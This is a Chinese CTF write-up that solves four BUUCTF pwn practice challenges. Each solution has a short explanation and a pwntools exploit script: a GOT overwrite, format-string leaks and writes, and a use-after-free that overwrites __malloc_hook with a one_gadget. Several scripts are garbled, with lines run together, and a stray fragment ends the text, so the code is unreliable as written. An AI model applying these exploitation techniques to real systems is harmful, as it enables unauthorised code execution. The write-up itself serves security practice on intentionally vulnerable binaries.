PWN-PRACTICE-BUUCTF-28
- wustctf2020_name_your_dog
- judgement_mna_2016
- gyctf_2020_some_thing_interesting
- xman_2019_format
wustctf2020_name_your_dog
Partial RELRO,可修改got表
scanf_got距离Dogs56个字节
当index为-7时,即可改写scanf_got为shell的地址
from pwn import *
#io = process("./wustctf2020_name_your_dog")
io = remote("node4.buuoj.cn",29103)
shell = 0x080485CB
io.sendlineafter("Name for which?\n>","-7")
io.sendlineafter("Give your name plz: ",p32(shell))
io.interactive()
judgement_mna_2016
格式化字符串漏洞,找到flag在栈上的偏移为28,"%28$s"即可打印出flag
from pwn import *
#io=process("./judgement_mna_2016")
io=remote("node4.buuoj.cn",25668)
io.recvuntil("Flag judgment system\nInput flag >> ")
flag_addr=0x0804A0A0
payload="%28$s"
io.sendline(payload)
io.interactive()
gyctf_2020_some_thing_interesting
格式化字符串+UAF,参考:[BUUCTF]PWN——gyctf_2020_some_thing_interesting(格式化字符串+UAF)
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./gyctf_2020_some_thing_interesting")
io=remote("node4.buuoj.cn",25715)
elf=ELF("./gyctf_2020_some_thing_interesting")
libc=ELF("./libc-2.23-16-x64.so")def check():#格式化字符串漏洞io.sendlineafter("> Now please tell me what you want to do :","0")
def add(O_len,O_content,RE_len,RE_content):io.sendlineafter("> Now please tell me what you want to do :","1")io.sendlineafter("> O's length : ",str(O_len))io.sendlineafter("> O : ",O_content)io.sendlineafter("> RE's length : ",str(RE_len))io.sendlineafter("> RE : ",RE_content)
def edit(index,O_content,RE_content):io.sendlineafter("> Now please tell me what you want to do :","2")io.sendlineafter("> Oreo ID : ",str(index))io.sendlineafter("> O : ",O_content)io.sendlineafter("> RE : ",RE_content)
def free(index):#UAFio.sendlineafter("> Now please tell me what you want to do :","3")io.sendlineafter("> Oreo ID : ",str(index))
def show(index):io.sendlineafter("> Now please tell me what you want to do :","4")io.sendlineafter("> Oreo ID : ",str(index))
def exit():io.sendlineafter("> Now please tell me what you want to do :","5")#gdb.attach(io)
#pause()code="OreOOrereOOreO" #len_code=14
payload=code+"%17$p"
io.sendlineafter("> Input your code please:",payload)
check()
io.recvuntil("# Your Code is "+code+"0x")
__libc_start_main=int(io.recvuntil("\n")[:-1],16)-240
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
print("libc_base=="+hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]
ones=[0x45216,0x4526a,0xf02a4,0xf1147]
onegadget=libc_base+ones[3]#pause()add(0x68,"aaaa",0x68,"bbbb")
free(1)#pause()edit(1,p64(0),p64(malloc_hook-0x23))#pause()payload="d"*0x13+p64(onegadget)
add(0x68,"cccc",0x68,payload)#pause()io.sendlineafter("> Now please tell me what you want to do :","1")
io.sendlineafter("> O's length : ",str(0x10))io.interactive()
xman_2019_format
堆上的格式化字符串漏洞,参考:BUU-xman_2019_format-WP
# -*- coding:utf-8 -*-
#from pwn import *
#context.log_level="debug"
shell=0x080485AB
io=remote("node4.buuoj.cn",29724)
#io=process("./xman_2019_format")
addr=0x9c
payload="%"+str(addr)+"c%10$hhn"+"|"
payload+="%"+str(shell&0xffff)+"c%18$hn"
io.sendline(payload)
io.sendline("cat flag")
io.interactive()
 takes no parameters【新手必过坑之一】)